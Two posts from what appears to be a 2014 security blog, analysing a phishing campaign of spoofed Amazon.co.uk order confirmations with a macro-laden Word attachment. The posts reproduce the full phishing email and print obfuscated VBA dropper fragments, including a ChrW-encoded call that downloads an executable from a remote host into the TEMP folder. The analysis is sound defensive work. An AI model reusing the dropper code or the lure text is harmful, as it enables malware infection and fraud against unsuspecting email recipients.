Wednesday, November 19, 2014

Amazon Order Confirmation Phishing Campaign - Part II

In the last post I reviewed a phishing campaign that used spoofed Amazon.co.uk confirmation emails to bait recipients in to opening a Word doc attachment. This attachment contained a malicious macro that would download malware on to the host system. Now we are going to look a bit deeper by performing some static analysis on the document and the malware that is loaded on to the host system. Doing so will give us some insight in to nature of these files, besides simply being malicious, and what we can expect these files to do once they are executed.

Word Attachment

Let us take a take a look at the .doc file that is attached to the email. Upon opening the file, we notice that it is completely blank. We do receive a warning about enabling macros, however.


Since we only want to analyze this file, there is no need to enable the macros. We only want to view the macros in this file. I personally decided to use the Microsoft VBS editor that comes with Microsoft Office to analyze the code. The code can be found here at Pastebin and appears to have a lot of non-useful code segments such as conditional statements that will never execute. This is likely a type of obfuscation that the author decided to use in order to throw off those viewing the actual VBScript.

After wading through the obfuscation, we find what appears to be some relevant lines of code.

Function SICJGWUTEZO(ByVal IYDOISAYNTH As String, ByVal PAUINJYOMZI As String) As Boolean
    Dim JGNEZQPKOWX As Object, ZSIJJVHVMOQ As Long, LSCOYILUQNP As Long,     
APXADSKJDFK() As Byte
    Set JGNEZQPKOWX = CreateObject("MSXML2.XMLHTTP")
    JGNEZQPKOWX.Open "GET", IYDOISAYNTH, False
    JGNEZQPKOWX.SEND "send REQUEST"

The code snippets above appears to show an outbound HTTP GET request to a remote host. The only problem is that we don't know what the remote host is in this case. It appears that the variable 'IYDOISAYNTH' is the remote host here. This variable is a parameter that is defined for function 'SICJGWUTEZO'. The only other instance of this function being called occurs here:

    SICJGWUTEZO ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(58) & ChrW(47) & ChrW(47) & ChrW(103) & ChrW(97) & ChrW(114) & ChrW(102) & ChrW(105) & ChrW(101) & ChrW(108) & ChrW(100) & ChrW(54) & ChrW(55) & ChrW(46) & ChrW(100) & ChrW(101) & ChrW(47) & ChrW(49) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101), Environ("TEMP") & "\SUVCKSGZTGK.exe"

Decoding the ChrW values reveals http//garfield67.de/1.exe as the file that the HTTP GET request resource. That is very interesting but not all that surprising. Running the address through Virus Total produces a detection rate of 16/61.


We need to analyze this file if we want to determine how it will modify the host system. While the macro provides a great deal of information, it is essentially a way to infect the system.

1.exe

So I feel that I should start this section out by first stating that the executable is no longer available. At some point it was taken down, likely because this server was hosting malicious content and they don't tend to last all that long.

This first thing we are going to do is determine if this file is actually and executable. It is not uncommon for malicious files to have extensions that are different from their actual file type. This doesn't seem like a good case to do such a thing but let's do our due diligence anyway.


Everything here appears to indicate that this is indeed an executable file. The file command indicates this and as we would expect the 'MZ' value if found at the beginning of the hex dump. Using strings does not yield any useful information such as hard coded IP addresses or credentials. One piece of valuable information that we can extract from the strings of the executable would be the DLL libraries that are imported for use by the executable. This can be done using a tool like IDA Pro as well but for the purposes of brevity the strings output is as follows:


A little Googling reveals that the majority of these libraries are used for network-based communications. This would indicate that the malware has networking capabilities and will attempt to reach out to remote hosts.  More digging in to the binary is needed so that we can accurately identify how this malware will communicate. This will require that we use some more advanced analysis techniques and will be the subject of our next post.


Part One
Part Three

Wednesday, November 12, 2014

Amazon Order Confirmation Phishing Campaign

Recently a new phishing campaign has been brought to my attention. I have been noticing a high number of downloads from hosts for executables. This activity is causing snort-based signatures to fire when these downloads are attempted. After a little investigation, I found that a good bit of people are receiving these phishing emails which contain an attachment. This attachment appears to be the stimulus for the downloads we are observing.

Some Google searching returns a number of articles about this ongoing campaign. My Online Security provides us with the actual email that is being distributed to potential victims.

Examining the email, it appears to be legitimate, but there are a few key indications that something is wrong. The most noticeable indication is the broken English in the email.
Dear Customer,
Greetings from Amazon.co.uk,
We are writing to let you know that the following item has been sent using  Royal Mail.
For more information about delivery estimates and any open orders, please visit: http://www.amazon.co.uk/your-account
Your order #203-2083868-0173124 (received October 30, 2014)

Your right to cancel:At Amazon.co.uk we want you to be delighted every time you shop with us.  O=ccasionally though, we know you may want to return items. Read more about o=ur Returns Policy at:  http://www.amazon.co.uk/returns-policy/
Further, under the United Kingdom's Distance Selling Regulations, you have =the right to cancel the contract for the purchase of any of these items wit=hin a period of 7 working days, beginning with the day after the day on whi=ch the item is delivered. This applies to all of our products. However, we =regret that we cannot accept cancellations of contracts for the purchase of= video, DVD, audio, video games and software products where the item has be=en unsealed. Please note that we are unable to accept cancellation of, or r=eturns for, digital items once downloading has commenced. Otherwise, we can= accept returns of complete product, which is unused and in an "as new" con=dition.
Our Returns Support Centre will guide you through our Returns Policy and, w=here relevant, provide you with a printable personalised return label.  Ple=ase go to http://www.amazon.co.uk/returns-support to use our Returns Suppor=t Centre.
To cancel this contract, please pack the relevant item securely, attach you=r personalised return label and send it to us with the delivery slip so tha=t we receive it within 7 working days after the day of the date that the it=em was delivered to you or, in the case of large items delivered by our spe=cialist couriers, contact Amazon.co.uk customer services using the link bel=ow within 7 working days after the date that the item was delivered to you =to discuss the return.
https://www.amazon.co.uk/gp/css/returns/homepage.html
For your protection, where you are returning an item to us, we recommend th=at you use a recorded-delivery service. Please note that you will be respon=sible for the costs of returning the goods to us unless we delivered the it=em to you in error or the item is faulty. If we do not receive the item bac=k from you, we may arrange for collection of the item from your residence a=t your cost. You should be aware that, once we begin the delivery process, =you will not be able to cancel any contract you have with us for services c=arried out by us (e.g. gift wrapping).
Please also note that you will be responsible for the costs of collection i=n the event that our specialist courier service collect a large item from y=ou to return to us.
As soon as we receive notice of your cancellation of this order, we will re=fund the relevant part of the purchase price for that item.=20
Should you have any questions, feel free to visit our online Help Desk at:==20http://www.amazon.co.uk/help
If you've explored the above links but still need to get in touch with us, =you will find more contact details at the online Help Desk.=20
Note: this e-mail was sent from a notification-only e-mail address that can=not accept incoming e-mail. Please do not reply to this message.=20
Thank you for shopping at Amazon.co.uk
-------------------------------------------------Amazon EU S.=C3=A0.r.L.c/o Marston GateRidgmont, BEDFORD MK43 0XPUnited Kingdom-------------------------------------------------
I will admit that I can't honestly remember the last time I actually read a confirmation email after making a purchase on Amazon. To me, this would suggest that it is conceivable that an unsuspecting recipient would not recognize this as a phishing attempt. I can also say that I also have never received a confirmation email with an attachment. This email, however, has an attached Microsoft Word document.

This .doc file (md5: a75e196e6c0cabc145f4cdc3177e66ec) appears to contain some macro that causes the system that it is executed on to make download requests. The intent here is that an individual will open the document, disable the macro security features that are presented when the file is opened and execute the VB script. It is common for a unsuspecting user to click past any warnings in documents such as these and the perpetrators are very aware of this.




This macro appears to lead to the download the file "1.exe" (md5: 954858bc0f115a4d6442afb333ec44c2) on to the host system. Once this file is executed...well let's just say all sorts of fun things begin to happen that we will explore further in the following posts. Running this executable through Virus Total produces a detection rate of 35/54. The name classifications continuously mention the name "Yakes" as the type of malware

In the following posts I will analyze the downloaded malware, Word document and any additional files that may be dropped on to the host system. Performing these steps will hopefully lead to additional information such as the origin of the campaign and the purpose of the malware.

Part Two
Part Three